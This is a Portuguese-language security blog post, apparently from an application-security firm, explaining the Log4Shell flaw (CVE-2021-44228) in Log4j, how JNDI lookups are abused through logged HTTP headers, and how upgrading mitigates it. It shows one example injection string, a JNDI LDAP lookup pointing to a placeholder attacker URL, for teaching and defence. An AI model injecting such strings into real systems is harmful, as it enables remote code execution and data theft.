Segurança de AplicaçãoTech

Tudo que você precisa saber de Log4j e como garantir a segurança de sua aplicação

Uma falha importante de segurança na biblioteca Apache Log4j, escrita em Java, foi revelada em 9 de dezembro de 2021 por um pesquisador da Alibaba Cloud, na China. Isso fez com que especialistas em segurança cibernética disparassem alarmes e grandes empresas fossem em busca de medidas para evitar possíveis ataques explorando essa nova vulnerabilidade CVE-2021-44228¹, também conhecida como “Log4Shell”. 

Você também pode ouvir esse conteúdo:

Por estar localizada em uma biblioteca utilizada por milhões de servidores web e por diversas empresas ao redor do mundo, essa vulnerabilidade crítica teve grande repercussão nos últimos dias devido ao seu risco potencial, visto que através dela é possível ter acesso a partes críticas de uma aplicação. Vale destacar que AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft estão entre os muitos serviços que utilizam a biblioteca Log4j. 

Além disso, para se ter uma ideia do potencial da vulnerabilidade, ela foi classificada com um nível de gravidade CVSS de 10 de 10. Jen Easterly², diretora do Departamento de Segurança Cibernética e Agência de Segurança de Infraestrutura (CISA) declarou na última semana (12/12) que “essa vulnerabilidade representa um risco grave” para toda a internet. Estima-se que a exploração afete centenas de milhões de dispositivos por ser muito simples de executar.

O que é Log4J

Log4j é uma estrutura de registro rápido e flexível escrita em Java, desenvolvida no início de 1996, sendo distribuída sob a licença do software Apache e podendo ser usada para projetos de pequena a grande escala.

Com mais de 400 mil downloads de seu projeto no GitHub³, o Apache Log4j é uma das bibliotecas de registro Java mais populares. Nesse sentido, essa biblioteca é utilizada para fazer logging nas aplicações, sendo esse um processo que permite guardar registros, envio de informações e processamento de dados, além de registro de erros. 

Por meio do logging, é possível analisar o funcionamento da aplicação e monitorar as alterações no processo de desenvolvimento. Portanto, sendo de código aberto e gratuito, a biblioteca alcança basicamente todas as partes da internet.

Como funciona a vulnerabilidade do Log4j

O Apache log4j possui um recurso de estrutura de registro denominado lookups, que permite aos usuários o cadastro de informações acerca de como suas atividades são registradas. Essas lookups são marcadas por variáveis ​​agrupadas pelos seguintes caracteres “$ {….}”.

Assim, variáveis definidas como “$ {variable}” podem ser utilizadas como data, horário ou nome de usuário. Nesse exemplo, a expressão “$ {user.username}” pode ser substituída pelo nome real do usuário usando uma expressão como “Log.info (“$ {user.username} not found”)”.

As bibliotecas de registro normalmente gravam mensagens em um arquivo de log ou em banco de dados. Para realizar a busca dessas informações em uma máquina remota, o Log4j utiliza o Java Naming and Directory Interface (JNDI), o qual permite a pesquisa de itens em locais remotos usando uma variedade de serviços e protocolos, incluindo LDAP, DNS, Java Remote Method Invocation (RMI) e entre outros. Sendo a sintaxe JNDI a seguinte expressão:

${ jndi:protocol://server}. ${}

Portanto, para tirar proveito desse recurso, o invasor precisa apenas encontrar a entrada que o direciona para o log, que geralmente é controlado pelo usuário. Embora isso dependa muito do tipo de aplicação, um método comum de injection é por meio de cabeçalhos HTTP que são regularmente registrados como User-Agent ou Referrer.

Exemplo de como funciona o ataque utilizando a vulnerabilidade do Log4j:

Em geral, caso a vulnerabilidade aconteça quando o cabeçalho User Agent é processado pela biblioteca, a falha do Log4j permite a execução de códigos não autenticados, podendo o invasor modificar a string do User Agent do navegador para o formato $ {jndi: ldap: // [attacker_URL]}. 

Com isso, a string é inserida nos logs de acesso do servidor da Web, o aplicativo Log4j analisa esses logs e, depois, alcança a string adicionada. Resultado, o servidor faz um retorno de chamada para a URL presente na string JNDI, sendo essa URL útil ao invasor para manipular comandos codificados e atingir seu objetivo.

Resumindo, a falha no Log4j permite que um invasor introduza um código no processo de registro, acionando o servidor de armazenamento de software para executar o comando desejado. Isso significa que ele pode roubar dados, instalar malware ou obter controle total da aplicação.

Dados mostram o crescimento de tentativas de ataque desse tipo após a publicação dessa vulnerabilidade. Para saber mais sobre os softwares que foram afetados por essa falha, indicamos essa lista disponibilizada no GitHub⁴ com os produtos e serviços impactados. <>

Como evitar os riscos de ameaça dessa falha

Supostamente o problema parece ter sido resolvido com o lançamento da nova versão do Log4j 2. Tendo isso em mente, recomendamos a atualização imediata para a sua nova versão. Você deve atualizar para 2.17 para mitigar CVE-2021-45105 se usar Java 8, atualizar para 2.16 para mitigar CVE-2021-44228 se usar Java 8 (ou posterior). Recomendamos também, se possível, não habilitar JNDI nas versões 2.16 ou 2.17.

Entretanto, divulgada pela própria Apache Software Foundation⁵, a  correção dessa vulnerabilidade não será aplicada de forma automática em todas as aplicações. Como resultado, esse problema ainda perdurará por bastante tempo e terá um impacto significativo nos próximos meses. 

Muitas empresas e instituições não usam Log4j diretamente em seu próprio código-fonte, mas podem usar produtos de terceiros que utilizam essa biblioteca em seu código. Nesse momento desafiador, estamos comprometidos em fornecer o suporte necessário aos nossos clientes e a toda a comunidade de segurança, além de construir recursos de segurança para superar o CVE-2021-44228.

Nova call to action

Referências

About author

Articles

Developer Advocate na Conviso, apoiando desenvolvedores e profissionais de segurança na melhoraria da qualidade e segurança de suas aplicações.
Related posts
Segurança de Aplicação

Desenvolvimento Seguro para Dispositivos de IoT: Garantindo a Resiliência na Era da Conectividade

Não é mais incomum olharmos para vários lugares e acharmos dispositivos IoT, estão em nossas…
Read more
Segurança de Aplicação

O Impacto da Inteligência Artificial no Desenvolvimento Seguro de Software

Não é segredo para ninguém, a Inteligência Artificial (IA) tem impactado significativamente…
Read more
Segurança de Aplicação

Secure By Design em ASPM - Como as ferramentas se integram ao processo

Neste artigo vamos trabalhar um pouco com os conceitos de Secure by Design em ASPM e como as…
Read more

Deixe um comentário

Descubra mais sobre Conviso AppSec

Assine agora mesmo para continuar lendo e ter acesso ao arquivo completo.

Continue reading